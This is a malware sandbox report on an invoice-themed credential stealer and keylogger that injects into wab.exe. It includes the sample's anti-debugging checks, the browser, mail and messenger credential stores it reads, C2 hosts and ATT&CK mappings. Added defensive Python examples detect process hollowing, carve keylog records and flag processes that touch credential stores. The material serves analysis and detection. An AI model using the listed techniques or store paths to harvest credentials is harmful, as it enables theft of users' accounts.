              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_356310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_35636580 FindFirstFileExA
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0040AE51 FindFirstFileW,FindNextFileW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | API call chain: ExitProcess graph end node graph_3-4598
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | API call chain: ExitProcess graph end node graph_3-4753
              Source: wab.exe, 00000007.00000002.45052676027.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
              Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_356360E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_6F1D1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,3_2_6F1D1B63
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_3563724E GetProcessHeap,7_2_3563724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 7_2_35634AB4: mov eax, dword ptr fs:[00000030h] (on 32-bit Windows fs:[30h] is the PEB pointer in the TEB; reading it directly is the usual prelude to checking PEB.BeingDebugged or NtGlobalFlag without calling IsDebuggerPresent)
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 7_2_356360E2: IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 7_2_35632B1C: SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 7_2_35632639: IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe: section loaded: C:\Windows\SysWOW64\mshtml.dll, target: C:\Program Files (x86)\Windows Mail\wab.exe, protection: read write
Source: C:\Program Files (x86)\Windows Mail\wab.exe: section loaded: unknown, target: C:\Program Files (x86)\Windows Mail\wab.exe, protection: execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe: section loaded: unknown, target: C:\Program Files (x86)\Windows Mail\wab.exe, protection: execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe: section loaded: unknown, target: C:\Program Files (x86)\Windows Mail\wab.exe, protection: execute and read and write
Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe: memory written: C:\Program Files (x86)\Windows Mail\wab.exe, base: 3000000
Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe: memory written: C:\Program Files (x86)\Windows Mail\wab.exe, base: 2F18008
Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe: process created: C:\Program Files (x86)\Windows Mail\wab.exe, command line: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe: process created: C:\Program Files (x86)\Windows Mail\wab.exe, command line: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfof
Source: C:\Program Files (x86)\Windows Mail\wab.exe: process created: C:\Program Files (x86)\Windows Mail\wab.exe, command line: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjo
Source: C:\Program Files (x86)\Windows Mail\wab.exe: process created: C:\Program Files (x86)\Windows Mail\wab.exe, command line: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrn
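Two things in the process-creation lines above are worth turning into detection logic. First, the injected wab.exe is started with the invoice executable's path as its command line, so the image on disk and the command line name different executables. Second, the three wab.exe children are launched with "/stext <file>" pointing into %TEMP%; wab.exe (the Windows Address Book) has no such switch, but NirSoft's password-recovery tools do, and /stext saves their results as a plain-text file. The WebBrowserPassView Yara hit in the summary and the www.nirsoft.net string recovered from process 9 further down support that reading. The following is an added example, not part of the Joe Sandbox report: a pass over constructed Sysmon-style process-creation events whose image, parent and command-line values mirror the lines above. The PIDs, the explorer.exe parent of the initial sample and the benign control row are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed events in the shape of Sysmon Event ID 1 (not telemetry from the
# report): image, parent and command line copy the "Process created" lines,
# the PIDs, the explorer.exe parent and the benign control row are made up.
EVENTS = [
    {"pid": 3, "ppid": 1,
     "image": r"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"'},
    {"pid": 7, "ppid": 3,
     "image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "parent_image": r"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",
     "command_line": r"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"},
    {"pid": 9, "ppid": 7,
     "image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "parent_image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "command_line": r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfof"'},
    {"pid": 10, "ppid": 7,
     "image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "parent_image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "command_line": r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjo"'},
    {"pid": 11, "ppid": 7,
     "image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "parent_image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "command_line": r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrn"'},
    # Benign control (made up): the user opens the Address Book from the shell.
    {"pid": 20, "ppid": 1,
     "image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files (x86)\Windows Mail\wab.exe"'},
]

# NirSoft-style switch: /stext followed by a quoted or bare output path.
STEXT_RE = re.compile(r'/stext\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def first_token(command_line: str) -> str:
    """Return the executable part of a command line, honouring a quoted path."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def image_cmdline_mismatch(ev: dict) -> bool:
    """Hollowing indicator: the executable on disk and the executable named by
    the command line differ (wab.exe was started with the invoice .exe's path)."""
    image_name = PureWindowsPath(ev["image"]).name.lower()
    cmd_name = PureWindowsPath(first_token(ev["command_line"])).name.lower()
    return image_name != cmd_name


def stext_output_in_temp(ev: dict):
    """Return the /stext output path if it lies under a temp directory, else None."""
    m = STEXT_RE.search(ev["command_line"])
    if not m:
        return None
    out = (m.group(1) or m.group(2)).lower()
    return out if any(d in out for d in TEMP_DIRS) else None


def evaluate(events):
    """Return (pid, rule) alerts, in event order, for every process that trips a rule."""
    alerts = []
    for ev in events:
        if image_cmdline_mismatch(ev):
            alerts.append((ev["pid"], "image_cmdline_mismatch"))
        if stext_output_in_temp(ev):
            alerts.append((ev["pid"], "nirsoft_stext_temp"))
    return alerts


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(f"pid {pid}: {rule}")
```

Run against the constructed events, the pass flags PID 7 for the image/command-line mismatch and PIDs 9, 10 and 11 for the /stext output in %TEMP%, and stays quiet on the original sample and on the benign wab.exe launch. The mismatch rule is deliberately not limited to wab.exe: any process whose command line names a different executable than its image deserves a look.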
Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Manager
Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Manager}|
Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Managerles\*
Source: wab.exe, 00000007.00000002.45053053148.0000000004CBB000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000003.40215942945.0000000004CAC000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000003.40255442769.0000000004CBB000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: [2023/10/31 13:19:59 Program Manager]
Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Manager<|T
Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program ManagerL
Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Managerr|
Source: wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program ManagerI
Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Manager*|B
Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: [2023/10/31 13:20:06 Program Manager]
Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Managerk|
Source: wab.exe, 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe: binary or memory string: [2023/10/31 13:20:06 Program Manager]
Source: wab.exe: binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 00000007.00000002.45052676027.0000000004C7A000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000003.40526012940.0000000004CA9000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: |Program Manager|
Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Managerur|
Source: wab.exe, 00000007.00000002.45066462805.0000000034ED6000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: Program Managerles\*t|
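The memory strings above give away the keylog record layout the injected wab.exe writes: a printf-style header "[%04i/%02i/%02i %02i:%02i:%02i <window title>]" followed, in the already-formatted instances, by a timestamp and the title of the foreground window ("Program Manager" is the desktop window in the sandbox, which is why it is the only title seen here). The following is an added example, not part of the Joe Sandbox report: a parser that carves such records out of a keylog buffer or a raw process memory dump. That the keystrokes for a window sit between its header and the next header is an assumption (the report only shows headers); the sample log, including the Notepad session, is constructed.

```python
import re
from datetime import datetime

# Header layout from the recovered format string:
# "[%04i/%02i/%02i %02i:%02i:%02i <window title>]". Titles containing "]" would
# truncate early; the class excludes "]" and line breaks so a header never
# swallows the keystrokes that follow it.
HEADER_RE = re.compile(
    r"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([^\]\r\n]*)\]"
)

# Constructed sample: two headers in the report's own format plus a made-up
# Notepad session. Not data from the sandbox run.
SAMPLE_LOG = (
    "[2023/10/31 13:19:59 Program Manager]\r\n"
    "[2023/10/31 13:20:06 Untitled - Notepad]\r\n"
    "down payment invoice[ENTER]\r\n"
    "[2023/10/31 13:20:40 Program Manager]\r\n"
)
# The same log surrounded by junk, as it would sit inside a process memory dump.
SAMPLE_DUMP = b"\x00\x00\x00\x00\x8b\xff" + SAMPLE_LOG.encode("ascii") + b"\x00garbage"


def parse_keylog(text: str) -> list:
    """Split a keylog buffer into records: time, window title, captured keys.
    Keys are assumed to run from one header to the next (assumption)."""
    records = []
    headers = list(HEADER_RE.finditer(text))
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        body = text[m.end():end]
        # A NUL means the log buffer ended and unrelated memory follows.
        body = body.split("\x00", 1)[0].strip("\r\n")
        y, mo, d, h, mi, s = (int(g) for g in m.groups()[:6])
        records.append({
            "time": datetime(y, mo, d, h, mi, s),  # victim local time; no tz in the header
            "window": m.group(7),
            "keys": body,
        })
    return records


def carve_keylog(blob: bytes) -> list:
    """Carve records out of raw memory. latin-1 maps bytes 1:1 so nothing raises
    on binary junk and the ASCII header still matches."""
    return parse_keylog(blob.decode("latin-1"))


def windows_with_input(records: list) -> list:
    """Window titles that actually received keystrokes, first-seen order."""
    seen = []
    for r in records:
        if r["keys"] and r["window"] not in seen:
            seen.append(r["window"])
    return seen


if __name__ == "__main__":
    for r in carve_keylog(SAMPLE_DUMP):
        print(r["time"].isoformat(), repr(r["window"]), repr(r["keys"]))
```

On the constructed dump the carver returns three records and reports "Untitled - Notepad" as the only window that received input; the two "Program Manager" records are empty, matching what the sandbox saw. Point carve_keylog at the .sdmp process dumps listed in this report (or at a recovered log file) to get the same structure from real memory.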
Source: C:\Program Files (x86)\Windows Mail\wab.exe: queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 7_2_35632933: cpuid
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 7_2_35632264: GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe, code function 3_2_004034A5: EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 10_2_00408043: memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy

Stealing of Sensitive Information

Yara match, file source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match, file source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match, file source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
Yara match, file source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 10_2_004033E2: ESMTPPassword
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 10_2_00402DA5: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword
Source: C:\Program Files (x86)\Windows Mail\wab.exe, code function 10_2_00402DA5: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword
Yara match, file source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
Yara match, file source: Process Memory Space: wab.exe PID: 6416, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe: key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Program Files (x86)\Windows Mail\wab.exe: file opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Mail\wab.exe: file opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Program Files (x86)\Windows Mail\wab.exe: file opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe: file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe: file opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe: file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
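The registry keys and files opened above are the credential stores of mail clients, instant messengers and browsers, and the tell is not any single access but one process that is none of those applications reaching into several of them. The following is an added example, not part of the Joe Sandbox report: a scoring pass over constructed registry- and file-access events that uses exactly the stores listed above. The category labels, the "owner" application used to suppress an application reading its own store, the PIDs and the benign control rows are assumptions.

```python
import re

# Credential stores taken from the keys and files opened above. "owner" is the
# process that legitimately reads the store; it only suppresses noise and is an
# assumption, as are the category labels. None = no owner suppression.
STORES = [
    ("mail", "outlook_omi_accounts", r"\\software\\microsoft\\office\\outlook\\omi account manager\\accounts$", "outlook.exe"),
    ("mail", "windows_messaging_profiles", r"\\windows messaging subsystem\\profiles$", None),
    ("mail", "incredimail_identities", r"\\software\\incredimail\\identities$", None),
    ("mail", "windows_live_mail", r"\\software\\microsoft\\windows live mail$", None),
    ("im", "google_talk_accounts", r"\\software\\google\\google talk\\accounts$", None),
    ("im", "paltalk", r"\\software\\paltalk$", None),
    ("account", "identitycrl_dynamic_salt", r"\\software\\microsoft\\identitycrl\\dynamic salt$", None),
    ("browser", "firefox_profiles_ini", r"\\mozilla\\firefox\\profiles\.ini$", "firefox.exe"),
    ("browser", "firefox_places", r"\\mozilla\\firefox\\profiles\\[^\\]+\\places\.sqlite$", "firefox.exe"),
    ("browser", "firefox_key4", r"\\mozilla\\firefox\\profiles\\[^\\]+\\key4\.db$", "firefox.exe"),
    ("browser", "chrome_login_data", r"\\google\\chrome\\user data\\[^\\]+\\login data$", "chrome.exe"),
    ("browser", "chrome_web_data", r"\\google\\chrome\\user data\\[^\\]+\\web data$", "chrome.exe"),
    ("browser", "edge_login_data", r"\\microsoft\\edge\\user data\\[^\\]+\\login data$", "msedge.exe"),
]
COMPILED = [(cat, name, re.compile(pat, re.IGNORECASE), owner) for cat, name, pat, owner in STORES]

WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
# Constructed access events (not the report's telemetry): paths copy the lines
# above, PIDs follow the report's process numbering, the last two rows are made-up
# benign controls.
EVENTS = [
    {"pid": 7, "image": WAB, "path": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt"},
    {"pid": 7, "image": WAB, "path": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt"},
    {"pid": 9, "image": WAB, "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite"},
    {"pid": 9, "image": WAB, "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db"},
    {"pid": 9, "image": WAB, "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"pid": 9, "image": WAB, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"},
    {"pid": 9, "image": WAB, "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"pid": 9, "image": WAB, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 10, "image": WAB, "path": r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
    {"pid": 10, "image": WAB, "path": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"},
    {"pid": 10, "image": WAB, "path": r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"},
    {"pid": 10, "image": WAB, "path": r"HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail"},
    {"pid": 11, "image": WAB, "path": r"HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts"},
    {"pid": 11, "image": WAB, "path": r"HKEY_CURRENT_USER\Software\Paltalk"},
    {"pid": 30, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db"},
    {"pid": 31, "image": r"C:\Windows\explorer.exe", "path": r"C:\Users\user\Desktop\notes.txt"},
]


def classify(path: str):
    """Map a registry key or file path to (category, store, owner), or None."""
    for cat, name, rx, owner in COMPILED:
        if rx.search(path):
            return cat, name, owner
    return None


def stores_by_process(events) -> dict:
    """Distinct credential stores touched per PID, skipping the store's own owner."""
    touched = {}
    for ev in events:
        hit = classify(ev["path"])
        if hit is None:
            continue
        cat, name, owner = hit
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if owner and image == owner:
            continue
        entry = touched.setdefault(ev["pid"], {"image": image, "stores": set(), "categories": set()})
        entry["stores"].add(name)
        entry["categories"].add(cat)
    return touched


def alerts(events, min_stores: int = 2) -> list:
    """A process that is not the owner and reaches into min_stores or more
    distinct stores is treated as a harvester. Sorted by PID."""
    out = []
    for pid, e in sorted(stores_by_process(events).items()):
        if len(e["stores"]) >= min_stores:
            out.append({"pid": pid, "image": e["image"],
                        "stores": sorted(e["stores"]), "categories": sorted(e["categories"])})
    return out


if __name__ == "__main__":
    for a in alerts(EVENTS):
        print(a["pid"], a["image"], a["categories"], len(a["stores"]), "stores")
```

With the default threshold the pass flags the three wab.exe children (PID 9 for six browser stores, PID 10 for four mail stores, PID 11 for two instant-messenger stores), ignores PID 7's single IdentityCRL access, and suppresses firefox.exe reading its own key4.db. Lowering min_stores to 1 surfaces PID 7 as well; the threshold is the knob between catching a single-target stealer and tolerating applications that legitimately read one store.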

Remote Access Functionality

Yara match, file source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match, file source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match, file source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
Yara match, file source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
MITRE ATT&CK Matrix

The matrix was flattened in the export and is reconstructed here by tactic. A number in front of a technique is Joe Sandbox's hit count for that technique in this analysis; techniques without a number are the unhighlighted cells of the matrix template and were not observed.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Native API; 2 Command and Scripting Interpreter; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 212 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 212 Process Injection; Indicator Removal from Tools; Masquerading
Credential Access: 1 OS Credential Dumping; 11 Input Capture; 2 Credentials in Registry; 1 Credentials In Files; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 28 System Information Discovery; 31 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 11 Input Capture; 11 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
Behavior Graph

Behavior Graph ID: 1334833; sample: 18001787_down_payment_invoice_90002104.exe; start date: 31/10/2023; architecture: WINDOWS; score: 100. The graph image did not survive extraction; its nodes and edges are rendered below as a process tree.

Contacted hosts: ourt2949aslumes9.duckdns.org; gudanidevelopment.ge; geoplugin.net
Top-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 8 other signatures

18001787_down_payment_invoice_90002104.exe (started)
    dropped: C:\Users\user\AppData\Local\...\System.dll (PE32)
    signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
    -> wab.exe (started)
        network: 94.156.6.253, ports 2402, 50077, 50078 (NET1-ASBG, Bulgaria); gudanidevelopment.ge 217.147.225.69, ports 50076, 80 (GRENA-AS, Tbilisi, Georgia); geoplugin.net 178.237.33.50, ports 50079, 80 (ATOM86-AS, Netherlands)
        dropped: C:\Users\user\AppData\Roaming\paqlgkfs.dat (data); C:\Users\user\AppData\...\Filamenterne.exe (PE32)
        signatures: Maps a DLL or memory area into another process; Installs a global keyboard hook
        -> wab.exe (started): Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
        -> wab.exe (started): Tries to steal Mail credentials (via file / registry access)
